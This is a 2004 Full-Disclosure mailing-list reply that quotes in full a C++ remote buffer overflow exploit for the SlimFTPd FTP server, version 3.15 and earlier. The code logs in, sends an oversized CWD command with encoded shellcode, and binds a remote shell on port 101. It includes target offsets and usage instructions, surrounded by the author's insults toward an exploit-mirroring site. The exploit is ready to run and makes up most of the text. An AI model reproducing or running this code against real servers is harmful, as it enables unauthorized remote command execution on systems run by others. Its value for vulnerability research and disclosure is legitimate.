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Re: [Full-Disclosure] [Advisory + Exploit] SlimFTPd <= 3.15

so what youre saying is that k-otik actually fucks up the exploits
before posting them? which i actually find to be plausible since  a
lot of the exploits posted there has not been functional


On Wed, 10 Nov 2004 15:27:54 +0100, class 101 <class101@xxxxxxxxxxxx> wrote:
> My nice words again are to kotik biatch.
> clean code on my website.
> /*
> SlimFTPd <= 3.15, Remote Buffer Overflow Exploit v0.1.
> Bind a shellcode to the port 101.
> Full disclosure and exploit 
> by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
> 10 november 2004
> Thanx to HDMoore and Metasploit.com for their kickass ASM work.
> ------------------
> ------------------
> Homepage - http://www.whitsoftdev.com/slimftpd/
>  SlimFTPd is a fully standards-compliant FTP server implementation with an
> advanced
>  virtual file system.It is extremely small, but don't let its file size
> deceive you:
>  SlimFTPd packs a lot of bang for the kilobyte. It is written in pure Win32
> C++ with
>  no external dependencies and no messy installer. SlimFTPd is a fully
> multi-threaded
>  application that runs as a system service on Windows 98/ME or Windows
> NT/2K/XP, and
>  it comes with a tool to simplify its installation or uninstallation as a
> system service.
>  Once the service is started, SlimFTPd runs quietly in the background.
>  It reads its configuration from a config file in the same folder as the
> executable,
>  and it outputs all activity to a log file in the same place.
>  The virtual file system allows you to mount any local drive or path to any
> virtual 
>  path on the server. This allows you to have multiple local drives
> represented on the 
>  server's virtual file system or just different folders from the same drive.
>  SlimFTPd allows you to set individual permissions for server paths. 
>  Open slimftpd.conf in your favorite text editor to set up SlimFTPd's
> configuration. 
>  The format of SlimFTPd's config file is similar to Apache Web Server's for
> those 
>  familiar with Apache.
> --------------
> --------------
>  A simple buffer overflow when a large buffer is passed to different
> commands, 
>  CWD, STOR, MKD, STAT etc.., nothing more, the attacker need to be logged
> in,
>  read the code for further instructions.
> ----
> ----
>  Actually none, the vendor is contacted, is warning users, and working on a
> fix.
> ----
> ----
>  Ok I'll try to explain what happen in this one with my crap english...
>  As you can notice , I havent used as usual a CALL/JMP offset address from a
> DLL.
>  Why ? Because if you debug, you will notice that we are able to overwrite 
>  only 3/4 bytes of EIP maximum due to a buffer length restriction in the ftp
> server (~500bytes).
>  The 4th byte will always point to 00. But this 00 is enough helpful to fake
> there my
>  magic ret ;p
>  Ok once you understand what is this magic ret , I think that you
> understanded all there...
> ----
> BY
> ----
>     class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
>        who
>         F.U.C.K
>     K-OTik.com displaying the half part of codes they receive
>  (also some other friends to me noticed it..., another ie: 
>  JPEG Exploits, 6 or 7 mirrors displayed, poor assh0les...)
> */
> #include "winsock2.h"
> #include "fstream.h"
> char scode[] = "\xEB"
> "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
> "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
> "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
> "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
> "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
> "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
> "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
> "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
> "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
> "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
> "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
> "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
> "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
> "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
> "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
> "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
> "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
> "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
> "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
> "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
> "\x58\x68\x61\x63\x6B\x90";
> char cmd[]="CWD ";
> char call[]="\xb2\x06\x40"; // Magicret ;p
> #pragma comment(lib, "ws2_32")
> void usage(char* us);
> WSADATA wsadata;
> void ver();
> static char payload[5000];
> int main(int argc,char *argv[])
> {
>  ver();
>  if
> ((argc<5)||(argc>6)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return
> -1;}
>  if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error:
> "<<WSAGetLastError()<<endl;return -1;}
>  char *login=argv[2], *passwd=argv[3], data[10], recvbuf2[100],
> recvbuf[100], rootbuf[100], logbuf[100], logbuf2[100], pdbuf[100],
> pdbuf2[100];
>  int ip=htonl(inet_addr(argv[4])), sz, a, sizeA, lgth, port;
>  if (argc==6){port=atoi(argv[5]);}
>  else port=21;
>  char *os;
>  if (atoi(argv[1]) == 1){os="Win2k based system";}
>  if (atoi(argv[1]) == 1){os="Win2k based system";}
>  if (atoi(argv[1]) == 2){os="WinXP based system";}
>  if (atoi(argv[1]) == 2){os="WinXP based system";}
>  SOCKET s;
>  struct fd_set mask;
>  struct timeval timeout; 
>  struct sockaddr_in server;
>  s=socket(AF_INET,SOCK_STREAM,0);
>  if (s==INVALID_SOCKET){ cout<<"[+] socket() error:
> "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
>  cout<<"[+] target: "<<os<<endl;   
>  server.sin_family=AF_INET;
>  server.sin_addr.s_addr=htonl(ip);
>  server.sin_port=htons(port);
>  WSAConnect(s,(struct sockaddr
> *)&server,sizeof(server),NULL,NULL,NULL,NULL);
>  timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
>  switch(select(s+1,NULL,&mask,NULL,&timeout))
>  {
>   case -1: {cout<<"[+] select() error:
> "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
>   case 0: {cout<<"[+] connect() error:
> "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
>   default:
>   if(FD_ISSET(s,&mask))
>   {
>    cout<<"[+] connected, login in process..."<<endl;
>    Sleep(100);recv(s,recvbuf2,100,0);
>    if (!strstr(recvbuf2,"220")){cout<<"[+] this is not an ftp server,
> quitting..."<<endl;return -1;}
>    strcpy(logbuf,"USER ");strcpy(logbuf2,login);strcpy(pdbuf,"PASS
> ");strcpy(pdbuf2,passwd);strcpy(rootbuf,"STOU AUX");strcpy(data,"\r\n");
>    if (send(s,logbuf,strlen(logbuf),0)==SOCKET_ERROR) { cout<<"[+] Error
> during the login processus, check the ftp."<<endl;return -1;}
>    if (send(s,logbuf2,strlen(logbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error
> during the login processus, check the ftp."<<endl;return -1;}
>    if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during
> the login processus, check the ftp."<<endl;return -1;}
>    Sleep(1000);
>    if (send(s,pdbuf,strlen(pdbuf),0)==SOCKET_ERROR) { cout<<"[+] Error
> during the login processus, check the ftp."<<endl;return -1;}
>    if (send(s,pdbuf2,strlen(pdbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error
> during the login processus, check the ftp."<<endl;return -1;}
>    if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during
> the login processus, check the ftp."<<endl;return -1;}
>    Sleep(1000);
>    if (recv(s,recvbuf,200,0)==SOCKET_ERROR){ cout<<"[+] Error during the
> login processus, check the ftp."<<endl;return -1;}
>    if (strstr(recvbuf,"530")){ cout<<"[+] wrong login or
> passwd"<<endl;return -1;}
>    cout<<"[+] login success!"<<endl;Sleep(1000);cout<<"[+] sending the
> exploit string"<<endl;
>    if (atoi(argv[1]) == 1){lgth=500+1;}
>    if (atoi(argv[1]) == 2){lgth=498+1;}
>    sizeA=lgth-sizeof(scode);
>    sz=(sizeA-1)+sizeof(scode)+10;
>    memset(payload,0,sizeof(payload));
>    strcat(payload,cmd);strcat(payload,"\x41\x41\x41");
>    strcat(payload,scode);
>    for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
>    strcat(payload,call);
>    strcat(payload,"\r\n");
>    Sleep(1000);
>       if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+]
> sending error, the server prolly rebooted."<<endl;return -1;}
>    if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] sending
> error, the server prolly rebooted."<<endl;return -1;}
>    Sleep(1000);
>    cout<<"[+] size of payload: "<<sz<<endl;   
>    cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
>    return 0;
>   }
>  }
>  closesocket(s);
>  WSACleanup();
>  return 0;
> }
> void usage(char* us) 
> {  
>  cout<<"USAGE: 101_slim.exe Target Login Pass Ip Port\n"<<endl;
>  cout<<"TARGETS:                               "<<endl;
>  cout<<"      [+] 1. Win2k SP4 English Pro    (*)"<<endl;
>  cout<<"      [+] 1. Win2k SP4 English Server (*)"<<endl;
>  cout<<"      [+] 1. Win2k all others            "<<endl;
>  cout<<"      [+] 2. WinXP SP1 English Pro    (*)"<<endl;
>  cout<<"      [+] 2. WinXP SP1 French Pro     (*)"<<endl;
>  cout<<"      [+] 2. WinXP all others            "<<endl;
>  cout<<"NOTE:                               "<<endl;
>  cout<<"      The port 21 is default if no port are specified"<<endl;
>  cout<<"      The exploit bind a shellcode to the port 101"<<endl;
>  cout<<"      A wildcard (*) mean Tested."<<endl;
>  return;
> } 
> void ver()
> { 
> cout<<endl;
> cout<<"                                                                  
> "<<endl;
> cout<<"       
> ===================================================[v0.1]===="<<endl;
> cout<<"        ========SlimFTPd, Tiny FTP Server for Windows <=
> v3.15======="<<endl; 
> cout<<"        =============Remote Buffer Overflow
> Exploit=================="<<endl;
> cout<<"        ====coded by class101===========[DFind.kd-team.com
> 2004]====="<<endl;
> cout<<"       
> ============================================================="<<endl;
> cout<<"                                                                  
> "<<endl;
> }

smile tomorrow will be worse

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